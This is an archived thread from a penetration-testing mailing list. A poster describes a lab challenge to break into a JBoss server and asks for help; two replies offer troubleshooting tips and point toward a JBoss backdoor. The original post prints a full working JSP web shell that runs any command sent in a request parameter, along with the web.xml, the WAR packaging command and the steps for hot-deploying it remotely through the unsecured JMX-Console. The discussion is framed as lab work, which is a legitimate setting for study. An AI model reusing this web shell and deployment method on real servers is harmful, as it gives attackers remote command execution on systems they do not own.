Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: breaking jboss with a browser? not happening

From: Matt Gardenghi <mtgarden () gmail com>
Date: Thu, 20 Jan 2011 14:13:39 -0500
I'd you have access to the admin console, you have the box. I'm not at
my desk now, but if you google for a JBoss backdoor, you should find a
PDF detailing how and where to deploy it.

It works and on Windows you get (or can get) system privs.

Tell me if you need more and I'll try to dig throughy files for the doc.

Matt

On Wednesday, January 19, 2011, Hembrow, Chris
<chris.hembrow () interserve com> wrote:

I've never tried deploying a WAR this way, and I've not used JBoss in a few=  years, but I'll try a few suggestions.  
In the JBoss console, can you see = a list of the deployed web apps somewhere?  This might let you see when/if = 
yours is deployed.

JBoss includes embedded Tomcat which handles the actual HTTP elements.  Cre= ating the WAR is just packaging for 
deployment, JSPs are compiled on the fl= y.  If there was an issue with your code you should get a 500 error, not 40= 
4.

Try deploying without the <servlet> block in the web.xml file; this shouldn= 't be necessary for a JSP page.  Also, 
try including a regular HTML page (i= .e. not JSP) in the WAR and accessing that.  This will rule out a compilati= on 
issue.=20

HTH

Chris

(Sorry for top posting, but Outlook sucks)

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of lazers
Sent: 14 January 2011 20:03
To: pen-test () securityfocus com
Subject: breaking jboss with a browser? not happening

I have been given task to break into jboss application by my senior sec manager at my company.
Its a hacking challenge staged in a test lab This is what i have been given.
A web-access to jboss.
Yes that pretty much it<3. He believes in less is more philosophy. With some get to start working info. I have been 
told that a vulnerability exists inthe application and its no 0 day exploit its an known vulnerability.It is set as 
an open-book challenge i can get help anywhere i like. So what i did so for?


Yes i google ; but i also run a nessus scan and the scan brought me one HIGH vulnerability. Its has to do with the 
default Jboss installation using the JMX-Console. Its not a new vulnerability i was able to reach this conclusion as 
i start googling. This particular vulnerability is very popular; I was saying to myself that my problems are over and 
i would be break it into jboss in record time. But that has been largely un-true. Why? Well if it wasn't true i 
wouldn't be  here. I did the following (in steps)


attack vector: deployment scanner feature





1.confirmed the default installation (by accessing localhost:9090) in my case its

9090 not 8080 as in hacking literature. Probably this is because em using a new version (idk exact reason)



2.i wrote this jsp script(cmd.jsp) astold in sites.

<%@ page import="java.util.*,java.io.*"%>

<%

%>

<HTML><BODY>

Commands with JSP

<FORM METHOD="GET" NAME="myform"ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

out.println("Command: " + request.getParameter("cmd") +"<BR>");

Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));

OutputStream os = p.getOutputStream();

InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in);

String disr = dis.readLine();

while ( disr != null ) {

out.println(disr);

disr = dis.readLine();

}

}

%>

</pre>

</BODY></HTML>



3.next i create a web.xml file to be placed in WEB-INF folder



<?xml version="1.0" ?>

<web-app xmlns="http://java.sun.com/xml/ns/j2ee";

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";

xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee

http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd";

version="2.4">

<servlet>

<servlet-name>Command</servlet-name>

<jsp-file>/cmd.jsp</jsp-file>

</servlet>

</web-app>



4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF folder



jar cvf cmd.war WEB-INF cmd.jsp



5. I put this file in http-apache server. File cmd.war reside at htdocs folder. Can be accessed by url: 
mywebserver:80/cmd.war



6.i go back to jboss defualt page and navigate myself to jboss.deploymentpage.



7. in the addurl tab i enter path for my cmd.war file as

http://mywebserver/cmd.war



8. next i goto victim webserver in attempt to access my uploaded application http://victim:9090/cmd/cmd.jsp



9. i get HTTP STATUS 404- /cmd/cmd.jsp



my app is suppose to be hot deployed by the jboss; bThis e-mail has been scanned for all viruses by WebSense 
MailControl.
www.websense.com

Click https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg==  to report this
email as spam.


"This email and any file attachments do not form a contract unless expressly stated. They may contain privileged, 
confidential and/or copyright information. If you are not the intended recipient or the service provider responsible 
for delivering this please delete the material from any computer and return to the sender at once; do not use, 
disclose or reproduce its contents. We do not accept liability for any error or omission in the message arising from 
corruption of, delay in or interference with, its transmission. We reserve the right to monitor email communications 
through normal internal and external networks. We believe but do not warrant that the email and the file attachments 
are virus free."

Interservefm Ltd.  Registered in England, Number : 2820560.
Registered Office: Capital Tower, 91 Waterloo Road, London SE1 8RT.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------




-- 
Matt Gardenghi

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: